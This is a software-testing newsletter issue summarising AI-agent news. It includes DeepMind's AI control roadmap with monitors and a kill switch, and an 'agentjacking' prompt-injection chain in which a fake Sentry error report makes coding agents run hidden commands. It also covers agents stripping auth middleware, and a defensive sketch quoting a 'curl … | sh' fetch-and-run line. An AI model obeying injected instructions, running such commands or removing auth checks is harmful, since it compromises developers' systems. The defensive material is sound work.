CODING JAG - Issue 301

Welcome to the 301st edition of Coding Jag brought to you by TestMu AI!👐

What a week to be an AI agent. OpenAI released a model that hunts and patches security flaws on its own, AWS and GitHub shipped new agent control planes, and then DeepMind admitted it's bracing for its own agents to go rogue. The pattern's hard to miss. As agents start writing and shipping code on their own, the real question isn't what they can do. It's who keeps them in check.

For testers, that's the whole story. Once an agent can grab a ticket, write the code, run the suite, and open the PR while you're at lunch, quality stops being a phase and becomes the control layer. So we've leaned into Agentic QA, Playwright's new test agents, and Microsoft's open-source ASSERT framework for testing whether agents follow the rules, plus a fresh attack class built for the agentic era and an open-weights model from Z.ai beating GPT-5.5 at a sixth of the cost.

📬 Come across something useful or interesting? Just reply and let's exchange ideas.

News

OpenAI Releases GPT-5.5-Cyber With Full Automation for Vulnerability Detection & Patching

10 min | cybersecuritynews.com

☁️ Guru Baran reports that OpenAI has shipped the full version of GPT-5.5-Cyber, a specialized model that finds and patches software vulnerabilities at machine speed. Highlights include a record 85.6% on the CyberGym benchmark, an updated Codex Security plugin that has already scanned over 30 million commits and auto-resolved more than 500,000 findings, and a deliberately restricted release to verified defenders only, coordinated with US standards bodies under the June 2026 AI security executive order.

Change Your Cyber Risk Strategy to Meet AI Threats, Five Eyes Countries Warn

08 min | csoonline.com

☁️ Howard Solomon reports that the US, UK, Canada, Australia, and New Zealand issued a rare joint statement urging leaders to treat AI as an immediate driver of cyber risk. Highlights include warnings that AI is accelerating vulnerability discovery and exploitation, a push to prioritize foundational security controls and accountability, and candid pushback from experts who found parts of the guidance too generic.

AWS Summit New York 2026: New Ways to Make AI Agents More Effective at Work

09 min | aboutamazon.com

☁️ AWS used its New York Summit to push agents deeper into real work and, notably, into testing. Highlights include autonomous Amazon Quick agents for finance and sales, an expanded AWS DevOps Agent that now runs release-readiness reviews and testing before code ships, and Kiro, its software-development agent, arriving on iOS so you can steer a session from your phone.

xAI Launches /goal in Grok Build for Self-Verifying Autonomous Coding

09 min | marktechpost.com

☁️ xAI has given Grok Build, its terminal coding agent, a new mode for taking on long-running tasks and running them with little supervision. Highlights include a /goal command that plans an approach, builds a progress checklist, and works through it step by step; built-in verification where the agent reviews its own code, inspects webpages, or runs scripts before calling a task done; and the freedom to keep adding instructions mid-run, with access gated to SuperGrok and X Premium Plus subscribers.

AI

Z.ai's Open-Weights GLM-5.2 Beats GPT-5.5 on Coding Benchmarks for 1/6th the Cost

09 min | venturebeat.com

☁️ VentureBeat reports that Z.ai's open-weights GLM-5.2 edges past GPT-5.5 on several long-horizon coding benchmarks at roughly one-sixth the cost. Highlights include a fully permissive MIT license with "no regional limits," a 753B-parameter Mixture-of-Experts design with a 1M-token context, and a top-tier finish on crowdsourced coding and design arenas.

Google DeepMind Unveils a Plan to Protect Itself From Its Own Rogue AI Agents

11 min | fortune.com

☁️ Google DeepMind published an "AI Control Roadmap" that treats advanced AI agents as potential insider threats, the way a security team treats an employee with sensitive access. Highlights include a threat taxonomy modeled on MITRE ATT&CK covering loss of control, work sabotage, and direct harm; a layered defense of evaluation, monitoring (trusted AI supervising other agents), and an infrastructure-level kill switch when alignment fails; and the disclosure that DeepMind has already screened a million coding-agent tasks to train its monitors. The roadmap is precautionary, tied to no real incident, and is being published so that other labs can adopt it.

Auth, Middleware, and SSO Patterns AI Coding Agents Skip

08 min | getautonoma.com

🔐 Tom Piaggio, Co-Founder at Autonoma, breaks down a dangerous pattern: AI coding agents treat authentication middleware like the Clerk wrapper as boilerplate ceremony and quietly strip it out during refactors. TypeScript does not catch it, the build passes, and CI stays green while protected routes silently stop requiring login. The only real fix is an E2E test that asserts on authenticated content and checks for the sign-in redirect.
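To make that kind of check concrete, here is a minimal sketch in Python using only the standard library. It is not Autonoma's test and it does not use Clerk: the `DemoApp` server, the `/dashboard` and `/sign-in` routes, and the session cookie value are all hypothetical stand-ins. The idea it illustrates is that the test asserts on behavior (anonymous users get redirected, signed-in users see real content), so deleting the guard fails the check even though the code still compiles.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

SESSION_COOKIE = "session=valid-demo-token"  # hypothetical cookie, for illustration only


class DemoApp(BaseHTTPRequestHandler):
    """Stand-in app: /dashboard must require a session cookie."""

    def do_GET(self):
        if self.path == "/dashboard":
            if self.headers.get("Cookie") != SESSION_COOKIE:
                # This is the guard an over-eager refactor might delete.
                self.send_response(302)
                self.send_header("Location", "/sign-in")
                self.end_headers()
                return
            body = b"Welcome back, demo-user"
        elif self.path == "/sign-in":
            body = b"Please sign in"
        else:
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep test output quiet
        pass


def fetch(port, path, cookie=None):
    """Issue one GET without following redirects; return (status, location, body)."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    headers = {"Cookie": cookie} if cookie else {}
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    result = (resp.status, resp.getheader("Location"), resp.read().decode())
    conn.close()
    return result


def check_protected_route(port):
    """True only if anonymous users are redirected and signed-in users see content."""
    anon_status, anon_location, anon_body = fetch(port, "/dashboard")
    auth_status, _, auth_body = fetch(port, "/dashboard", cookie=SESSION_COOKIE)
    redirected = anon_status == 302 and anon_location == "/sign-in"
    leaked = "Welcome back" in anon_body
    return redirected and not leaked and auth_status == 200 and "Welcome back" in auth_body


def run_demo():
    """Start the stand-in app on a free local port and run the check against it."""
    server = HTTPServer(("127.0.0.1", 0), DemoApp)  # port 0 = pick a free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return check_protected_route(server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()
```

Calling `run_demo()` exercises both halves of the assertion. In a real project the same two checks would more likely live in a browser-driven E2E suite pointed at a deployed preview rather than a local stub.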

AI in QA: How Teams Use It in 2026

09 min | testmuai.com

☁️ Salman Khan, a Test Automation Evangelist and Community Contributor at TestMu AI, breaks down how teams are actually using AI across the QA lifecycle in 2026, past the hype. Highlights include where AI genuinely saves time in test creation and maintenance, the shift from scripts to natural-language intent, and survey data showing most organizations now use or plan to use AI in their quality work.

A Public Sentry Key Is All It Takes to Hijack Claude Code, Cursor, and Codex

12 min | thenewstack.io

☁️ Janakiram MSV unpacks "agentjacking," the attack class Tenet Security disclosed this month, where a single fake error report turns your own AI coding agent into the weapon. Highlights include how the booby-trapped error rides in through a public Sentry key and the Sentry MCP connection, then runs with the developer's own privileges; why every step in the chain is "authorized," so EDR, firewalls, and IAM never raise a flag; and the uncomfortable root cause: an agent can't tell the data it reads from an instruction to act, so a command hidden in an error log simply runs. Tenet found 2,388 organizations exposed and an 85% success rate, and has open-sourced drop-in "agent-jackstop" configs to harden Cursor and Claude Code.
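One way to picture the data-versus-instruction problem is a gate that decides based on where a request came from rather than what it says. The sketch below is purely illustrative and is not Tenet's "agent-jackstop" config: the tool names, the source labels, and the `ToolCall` shape are all assumptions, and it takes for granted that the agent runtime can reliably record provenance, which is the hard part in practice.

```python
from dataclasses import dataclass

# Assumption: only text typed by the developer counts as an instruction.
TRUSTED_SOURCES = {"developer_prompt"}
# Hypothetical tool names; a real agent would list its own side-effecting tools.
SENSITIVE_TOOLS = {"shell", "write_file", "http_request"}


@dataclass(frozen=True)
class ToolCall:
    tool: str          # which tool the agent wants to invoke
    argument: str      # the command, path, or URL it wants to use
    derived_from: str  # source of the text that motivated this call


def decide(call: ToolCall) -> str:
    """Return 'allow' or 'needs_approval' based on provenance, not content."""
    if call.tool in SENSITIVE_TOOLS and call.derived_from not in TRUSTED_SOURCES:
        # Text that arrived as data (an error report, a web page, a log line)
        # must not be able to trigger side effects on its own.
        return "needs_approval"
    return "allow"
```

Under these assumptions, `decide(ToolCall("shell", "curl example.invalid | sh", "sentry_issue"))` returns `"needs_approval"`, while the same shell tool invoked from `"developer_prompt"` returns `"allow"`. Read-only tools stay usable on untrusted content, so the agent can still inspect an error report without being able to act on commands hidden inside it.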

Automation

What's New in Playwright 2026: Test Agents, MCP, and ARIA Snapshots

08 min | qaskills.sh

☁️ QASkills rounds up what's new in Playwright for 2026, now firmly an AI-native framework. Highlights include the planner/generator/healer Test Agents, an official MCP server that lets coding agents drive a real browser through structured accessibility snapshots, and ARIA snapshots for accessibility-tree assertions.

Appium Ships an Official MCP Server and AppClaw, a Natural-Language Agentic Layer for Mobile Tests

08 min | github.com

☁️ Appium now ships an official Model Context Protocol server that lets coding agents like Claude Code and Cursor drive real Android and iOS devices by natural-language description instead of brittle XPath. On top of it, the AppiumTestDistribution team's AppClaw adds a CLI agentic layer where instructions run directly or as plain-English YAML flows.

Tools

Best AI Tools for Customer Support in 2026

09 min | automationanywhere.com

⚒️ Anisha Kirpekar breaks down the shift from basic chatbots to full agentic automation in customer support. While most "AI support" tools still just deflect tickets with FAQs, true agentic platforms detect issues, reason through them, and resolve tickets autonomously across CRM, ticketing, and ERP systems. Gartner data shows AI deflects 45% of queries but fully resolves only 14% without human help.

Agent Finder for GitHub Copilot Now Available

07 min | github.blog

☁️ GitHub shipped agent finder, letting Copilot discover the right MCP servers, skills, and tools for a task instead of loading everything up front. Highlights include plain-language capability search, ranked matches pulled in on demand from a registry you choose, and an implementation of the open Agentic Resource Discovery spec built with Google, GoDaddy, Hugging Face, and Microsoft.

Video & Podcast

TestGuild News Show: Is AI Coming for Testers, or Are You About to Win Big?

09 min | podcasts.apple.com

☁️ In this 9-minute episode of his TestGuild News Show, Joe Colantonio asks whether testers are first in line to lose work to AI or first in line to win the next big role. Along the way, he covers the selector trap that eats roughly 80% of a team's time, and whether Apple's new self-testing agent in Xcode 27 is a genuine leap or just more vibe coding to clean up later.

Software Testing Unleashed: What AI Really Does to Trust and Team Dynamics

08 min | richard-seidl.com

☁️ Richard Seidl argues that dropping AI into a team quietly erodes trust, empathy, and the shared mental model, because it strips out the friction teams actually need for innovation. His fix is to stop treating AI as a tool you roll out and start onboarding it like a new team member, with explicit rules for its coordination, creativity, and quality-assurance roles and clear lines on where humans still decide.

Events

AI Testing Conference 2026

07 min | testmuai.com

🎤 TestMu Conference 2026 is a free virtual software testing event taking place from August 19 to 21, 2026. Bringing together 75,000+ testers and 100+ expert speakers and sessions, the conference will cover AI in testing, test automation, quality engineering, and the latest trends shaping the future of software quality. Registration is now open and free for all attendees.

IEEE AITest 2026: International Conference on Artificial Intelligence Testing

08 min | cisose.fit.ac.jp

🎤 The 8th IEEE AITest runs July 27-30, 2026, in Fukuoka, Japan, as part of the IEEE CISOSE congress. Highlights include a program built entirely around the synergy of AI and software testing, sessions on both testing AI applications and using AI techniques to strengthen testing, and a forum where researchers and practitioners trade new methods, tools, and real-world case studies.